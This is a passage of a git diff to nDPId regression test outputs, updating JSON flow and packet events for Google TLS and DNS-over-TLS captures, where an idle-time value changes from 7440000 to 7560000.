-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434443394683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1434443394683,"pkt":"AA6OTbSogMbKAJ6fCABFAAAsBqJAAEAG14usHwPg2DrUZKdTAbt6Z3LqAAAAAGACFtCOVwAAAgQFtA=="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434443394717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434443394717,"pkt":"gMbKAJ6fAA6OTbSoCABFAAAseLYAADMGsnfYOtRkrB8D4AG7p1PuIxETemdy62ASp5T+aAAAAgQFlgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434443394851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434443394851,"pkt":"AA6OTbSogMbKAJ6fCABFAAAoBqNAAEAG146sHwPg2DrUZKdTAbt6Z3Lr7iMRFFAQFtCmzAAA"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434443394683,"flow_last_seen":1434443394683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434443394683,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434443394683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1434443394683,"pkt":"AA6OTbSogMbKAJ6fCABFAAAsBqJAAEAG14usHwPg2DrUZKdTAbt6Z3LqAAAAAGACFtCOVwAAAgQFtA=="} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434443394717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434443394717,"pkt":"gMbKAJ6fAA6OTbSoCABFAAAseLYAADMGsnfYOtRkrB8D4AG7p1PuIxETemdy62ASp5T+aAAAAgQFlgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434443394851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434443394851,"pkt":"AA6OTbSogMbKAJ6fCABFAAAoBqNAAEAG146sHwPg2DrUZKdTAbt6Z3Lr7iMRFFAQFtCmzAAA"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","packets-captured":28,"packets-processed":28,"total-skipped-flows":0,"total-l4-data-len":7568,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1434443401353} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 28/28 diff --git a/test/results/googledns_android10.pcap.out b/test/results/googledns_android10.pcap.out index a0d1e73c9..d1fef874f 100644 --- a/test/results/googledns_android10.pcap.out +++ b/test/results/googledns_android10.pcap.out 
@@ -1,61 +1,61 @@ 00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"googledns_android10.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592552824409} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552824409,"flow_last_seen":1592552824409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552824409,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592552824409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824409,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gpUAAHcG7tcICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT59wAAAQEIChWqa0r\/\/5Cw"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592552824632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824632,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0gzYAAHcG7jYICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT5GAAAAQEIChWqbCn\/\/5Cw"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592552824856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824856,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0g5MAAHcG7dkICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT4OAAAAQEIChWqbQn\/\/5Cw"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8tGBAAEAGuAjAqAGfCAgEBLusA1UTsXihAAAAAKAC\/\/9hlgAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8yAFAAEAGoGPAqAGfCAgICNrYA1WXsATAAAAAAKAC\/\/8uSAAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"} 
-00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"} 
-00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 
-01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="} 
-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
